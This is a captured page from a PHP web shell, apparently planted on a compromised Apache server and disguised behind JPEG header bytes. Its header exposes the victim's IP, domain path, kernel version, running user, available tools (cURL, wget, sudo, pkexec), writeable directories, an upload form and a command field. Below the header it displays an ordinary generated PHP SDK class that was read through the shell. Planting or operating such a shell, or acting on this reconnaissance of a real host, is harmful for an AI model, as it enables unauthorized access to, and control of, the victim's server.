????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.116.85.79
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/sharepoint/vendor/vgrem/php-spo/src/Graph/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/icad.astacus.se/sharepoint/vendor/vgrem/php-spo/src/Graph/ManagedAppProtection.php
<?php

/**
 * Generated by phpSPO model generator 2020-05-26T22:07:25+00:00 
 */
namespace Office365\Graph;

use Office365\Runtime\ClientObject;
use Office365\Runtime\ResourcePath;
class ManagedAppProtection extends ClientObject
{
    /**
     * @return bool
     */
    public function getOrganizationalCredentialsRequired()
    {
        if (!$this->isPropertyAvailable("OrganizationalCredentialsRequired")) {
            return null;
        }
        return $this->getProperty("OrganizationalCredentialsRequired");
    }
    /**
     * @var bool
     */
    public function setOrganizationalCredentialsRequired($value)
    {
        $this->setProperty("OrganizationalCredentialsRequired", $value, true);
    }
    /**
     * @return bool
     */
    public function getDataBackupBlocked()
    {
        if (!$this->isPropertyAvailable("DataBackupBlocked")) {
            return null;
        }
        return $this->getProperty("DataBackupBlocked");
    }
    /**
     * @var bool
     */
    public function setDataBackupBlocked($value)
    {
        $this->setProperty("DataBackupBlocked", $value, true);
    }
    /**
     * @return bool
     */
    public function getDeviceComplianceRequired()
    {
        if (!$this->isPropertyAvailable("DeviceComplianceRequired")) {
            return null;
        }
        return $this->getProperty("DeviceComplianceRequired");
    }
    /**
     * @var bool
     */
    public function setDeviceComplianceRequired($value)
    {
        $this->setProperty("DeviceComplianceRequired", $value, true);
    }
    /**
     * @return bool
     */
    public function getManagedBrowserToOpenLinksRequired()
    {
        if (!$this->isPropertyAvailable("ManagedBrowserToOpenLinksRequired")) {
            return null;
        }
        return $this->getProperty("ManagedBrowserToOpenLinksRequired");
    }
    /**
     * @var bool
     */
    public function setManagedBrowserToOpenLinksRequired($value)
    {
        $this->setProperty("ManagedBrowserToOpenLinksRequired", $value, true);
    }
    /**
     * @return bool
     */
    public function getSaveAsBlocked()
    {
        if (!$this->isPropertyAvailable("SaveAsBlocked")) {
            return null;
        }
        return $this->getProperty("SaveAsBlocked");
    }
    /**
     * @var bool
     */
    public function setSaveAsBlocked($value)
    {
        $this->setProperty("SaveAsBlocked", $value, true);
    }
    /**
     * @return bool
     */
    public function getPinRequired()
    {
        if (!$this->isPropertyAvailable("PinRequired")) {
            return null;
        }
        return $this->getProperty("PinRequired");
    }
    /**
     * @var bool
     */
    public function setPinRequired($value)
    {
        $this->setProperty("PinRequired", $value, true);
    }
    /**
     * @return integer
     */
    public function getMaximumPinRetries()
    {
        if (!$this->isPropertyAvailable("MaximumPinRetries")) {
            return null;
        }
        return $this->getProperty("MaximumPinRetries");
    }
    /**
     * @var integer
     */
    public function setMaximumPinRetries($value)
    {
        $this->setProperty("MaximumPinRetries", $value, true);
    }
    /**
     * @return bool
     */
    public function getSimplePinBlocked()
    {
        if (!$this->isPropertyAvailable("SimplePinBlocked")) {
            return null;
        }
        return $this->getProperty("SimplePinBlocked");
    }
    /**
     * @var bool
     */
    public function setSimplePinBlocked($value)
    {
        $this->setProperty("SimplePinBlocked", $value, true);
    }
    /**
     * @return integer
     */
    public function getMinimumPinLength()
    {
        if (!$this->isPropertyAvailable("MinimumPinLength")) {
            return null;
        }
        return $this->getProperty("MinimumPinLength");
    }
    /**
     * @var integer
     */
    public function setMinimumPinLength($value)
    {
        $this->setProperty("MinimumPinLength", $value, true);
    }
    /**
     * @return bool
     */
    public function getContactSyncBlocked()
    {
        if (!$this->isPropertyAvailable("ContactSyncBlocked")) {
            return null;
        }
        return $this->getProperty("ContactSyncBlocked");
    }
    /**
     * @var bool
     */
    public function setContactSyncBlocked($value)
    {
        $this->setProperty("ContactSyncBlocked", $value, true);
    }
    /**
     * @return bool
     */
    public function getPrintBlocked()
    {
        if (!$this->isPropertyAvailable("PrintBlocked")) {
            return null;
        }
        return $this->getProperty("PrintBlocked");
    }
    /**
     * @var bool
     */
    public function setPrintBlocked($value)
    {
        $this->setProperty("PrintBlocked", $value, true);
    }
    /**
     * @return bool
     */
    public function getFingerprintBlocked()
    {
        if (!$this->isPropertyAvailable("FingerprintBlocked")) {
            return null;
        }
        return $this->getProperty("FingerprintBlocked");
    }
    /**
     * @var bool
     */
    public function setFingerprintBlocked($value)
    {
        $this->setProperty("FingerprintBlocked", $value, true);
    }
    /**
     * @return bool
     */
    public function getDisableAppPinIfDevicePinIsSet()
    {
        if (!$this->isPropertyAvailable("DisableAppPinIfDevicePinIsSet")) {
            return null;
        }
        return $this->getProperty("DisableAppPinIfDevicePinIsSet");
    }
    /**
     * @var bool
     */
    public function setDisableAppPinIfDevicePinIsSet($value)
    {
        $this->setProperty("DisableAppPinIfDevicePinIsSet", $value, true);
    }
    /**
     * @return string
     */
    public function getMinimumRequiredOsVersion()
    {
        if (!$this->isPropertyAvailable("MinimumRequiredOsVersion")) {
            return null;
        }
        return $this->getProperty("MinimumRequiredOsVersion");
    }
    /**
     * @var string
     */
    public function setMinimumRequiredOsVersion($value)
    {
        $this->setProperty("MinimumRequiredOsVersion", $value, true);
    }
    /**
     * @return string
     */
    public function getMinimumWarningOsVersion()
    {
        if (!$this->isPropertyAvailable("MinimumWarningOsVersion")) {
            return null;
        }
        return $this->getProperty("MinimumWarningOsVersion");
    }
    /**
     * @var string
     */
    public function setMinimumWarningOsVersion($value)
    {
        $this->setProperty("MinimumWarningOsVersion", $value, true);
    }
    /**
     * @return string
     */
    public function getMinimumRequiredAppVersion()
    {
        if (!$this->isPropertyAvailable("MinimumRequiredAppVersion")) {
            return null;
        }
        return $this->getProperty("MinimumRequiredAppVersion");
    }
    /**
     * @var string
     */
    public function setMinimumRequiredAppVersion($value)
    {
        $this->setProperty("MinimumRequiredAppVersion", $value, true);
    }
    /**
     * @return string
     */
    public function getMinimumWarningAppVersion()
    {
        if (!$this->isPropertyAvailable("MinimumWarningAppVersion")) {
            return null;
        }
        return $this->getProperty("MinimumWarningAppVersion");
    }
    /**
     * @var string
     */
    public function setMinimumWarningAppVersion($value)
    {
        $this->setProperty("MinimumWarningAppVersion", $value, true);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit